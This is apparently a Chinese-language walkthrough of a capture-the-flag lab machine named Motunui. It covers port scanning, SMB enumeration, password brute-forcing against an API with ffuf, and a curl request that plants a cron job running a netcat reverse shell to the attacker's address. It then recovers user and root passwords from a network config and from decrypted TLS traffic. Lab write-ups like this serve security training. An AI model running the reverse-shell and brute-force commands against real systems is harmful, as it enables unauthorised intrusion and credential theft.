端口扫描

sudo nmap --min-rate 10000 -p- 10.10.201.190
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 03:43 UTC
Nmap scan report for 10.10.201.190
Host is up (0.38s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3000/tcp open ppp
5000/tcp open upnp

Nmap done: 1 IP address (1 host up) scanned in 22.91 seconds
sudo nmap -sT -sV -sC -O -p22,80,139,445,3000,5000 10.10.201.190                                 
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 03:44 UTC
Nmap scan report for 10.10.201.190
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:f4:43:ac:39:fe:94:13:7a:ad:3d:e6:5f:b4:7e:71 (RSA)
| 256 49:8c:75:e1:78:e9:72:65:de:c9:14:74:0f:d4:1a:81 (ECDSA)
|_ 256 0b:b6:27:f9:ad:ed:22:a9:90:ac:9e:b3:85:1b:aa:96 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open ���l�U Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
3000/tcp open ppp?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 174
| Date: Mon, 04 Dec 2023 03:44:35 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /nice%20ports%2C/Tri%6Eity.txt%2ebak</pre>
| </body>
| </html>
| GetRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 139
| Date: Mon, 04 Dec 2023 03:44:28 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /</pre>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Date: Mon, 04 Dec 2023 03:44:30 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot OPTIONS /</pre>
| </body>
|_ </html>
5000/tcp open ssl/http Node.js (Express middleware)
| tls-nextprotoneg:
| http/1.1
|_ http/1.0
| ssl-cert: Subject: organizationName=Motunui/stateOrProvinceName=Motunui/countryName=GB
| Not valid before: 2020-08-03T14:58:59
|_Not valid after: 2021-08-03T14:58:59
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94%I=7%D=12/4%Time=656D4B1D%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Poli
SF:cy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20139\r
SF:\nDate:\x20Mon,\x2004\x20Dec\x202023\x2003:44:28\x20GMT\r\nConnection:\
SF:x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<met
SF:a\x20charset=\"utf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Ca
SF:nnot\x20GET\x20/</pre>\n</body>\n</html>\n")%r(HTTPOptions,16C,"HTTP/1\
SF:.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-src\x2
SF:0'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20text/
SF:html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Mon,\x2004
SF:\x20Dec\x202023\x2003:44:30\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOC
SF:TYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"utf-8\
SF:">\n<title>Error</title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\x20/<
SF:/pre>\n</body>\n</html>\n")%r(FourOhFourRequest,18B,"HTTP/1\.1\x20404\x
SF:20Not\x20Found\r\nContent-Security-Policy:\x20default-src\x20'none'\r\n
SF:X-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20text/html;\x20ch
SF:arset=utf-8\r\nContent-Length:\x20174\r\nDate:\x20Mon,\x2004\x20Dec\x20
SF:2023\x2003:44:35\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20htm
SF:l>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>
SF:Error</title>\n</head>\n<body>\n<pre>Cannot\x20GET\x20/nice%20ports%2C/
SF:Tri%6Eity\.txt%2ebak</pre>\n</body>\n</html>\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|storage-misc
Running (JUST GUESSING): Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3
Aggressive OS guesses: Crestron XPanel control system (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: MOTUNUI; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: motunui
| NetBIOS computer name: MOTUNUI\x00
| Domain name: \x00
| FQDN: motunui
|_ System time: 2023-12-04T03:45:02+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-12-04T03:45:01
|_ start_date: N/A
|_nbstat: NetBIOS name: MOTUNUI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 1s, median: 0s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.57 seconds

SMB枚举

smbmap -H 10.10.201.190

得到一个traces共享目录

smbclient //10.10.201.190/traces

发现有一堆流量包,但只有maui的有用,下载下来。wireshark打开,但是发现都是大多都是加密后的流量。有一条http流量非常可疑,是一张图片,导出发现给了一个URL:d3v3lopm3nt.motunui.thm,添加进hosts

Web

访问发现是apache的默认目录,同时扫一下还有没有别的子域

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://motunui.thm' -H 'HOST:FUZZ.motunui.thm' -fs 10918

看样子是没有,访问之前找到的子域

显示是给开发人员的

扫一下目录,有一个docs,访问得到一个README.md

# Documentation for the in-development API

##### [Changelog](CHANGELOG.md) | [Issues](ISSUES.md)

Please do not distribute this documentation outside of the development team.

## Routes

Find all of the routes [here](ROUTES.md).

发现还有三个.md文件,在docs中全部下载下来

然而只有routes有内容

# Routes

The base URL for the api is `api.motunui.thm:3000/v2/`.

### `POST /login`

Returns the hash for the specified user to be used for authorisation.

#### Parameters

- `username`
- `password`

#### Response (200)

​```js
{
"hash": String()
}
​```

#### Response (401)

​```js
{
"error": "invalid credentials"
}
​```

### 🔐 `GET /jobs`

Returns all the cron jobs running as the current user.

#### Parameters

- `hash`

#### Response (200)

​```js
{
"jobs": Array()
}
​```

#### Response (403)

​```js
{
"error": "you are unauthorised to view this resource"
}
​```

### 🔐 `POST /jobs`

Creates a new cron job running as the current user.

#### Parameters

- `hash`

#### Response (201)

​```js
{
"job": String()
}
​```

#### Response (401)

​```js
{
"error": "you are unauthorised to view this resource"
}
​```

Gethell

得到另一个子域,添加进hosts

似乎存在login,和jobs两个路由,但是需要用户和密码。目前没有任何信息

查看v1的API版本时,在POST请求login时,让我们用maui来登录。也许可以爆破密码

ffuf -w /usr/share/wordlists/rockyou.txt -u 'http://api.motunui.thm:3000/v2/login' -H 'Content-Type: application/json' -d '{"username":"maui","password":"FUZZ"}' -fs 31

得到密码为island(用THM的kali速度就是快啊)

curl -H 'Content-Type: application/json' -d '{"username":"maui","password":"island"}' -XPOST http://api.motunui.thm:3000/v2/login

得到了{“hash”:”aXNsYW5k”}

curl -H 'Content-Type: application/json' -d '{"hash":"aXNsYW5k","job":"* * * * * rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.11.38.245 1234 >/tmp/f" }' -XPOST http://api.motunui.thm:3000/v2/jobs

新增一个crontab,写上反弹shell

提权

在moana用户家目录有个readme,让我们完成packet tracer的网络,并提示了不要密码重用,这是思科用于学习计算机网络的一款软件,文件的后缀为.pkt

find / -name "*.pkt" 2>/dev/null

在软件中打开,打开交换机的config,导出正在运行的配置,在其中找到moana的密码:H0wF4ri’LLG0

接着就是提权了,在/var/www目录还看到一个tls目录,其中有用于tls加密用的公私钥,以及这个网页所采用的nodejs脚本,并找到私钥的密码为Password1

想到之前在smb找到的那个流量包中有一对tls加密后的流量,但是奇怪的是我用了这个密钥直接提示出错,也许这是一个兔子洞

在/etc/中又找到一个ssl.txt,才知道原来ssl日志也可以用来解密

在wireshark中找到“编辑”->”首选项”->”协议”->”TLS”导入日志之后,发现多了好多http的流量,在其中找到root的密码:Pl3aseW0rk

碎碎念

又遇到了API,无非就是考察POST和JSON之类的,还是挺有趣的。有些地方脑洞还比较大的吧,得去了解一下SSL/TLS加密了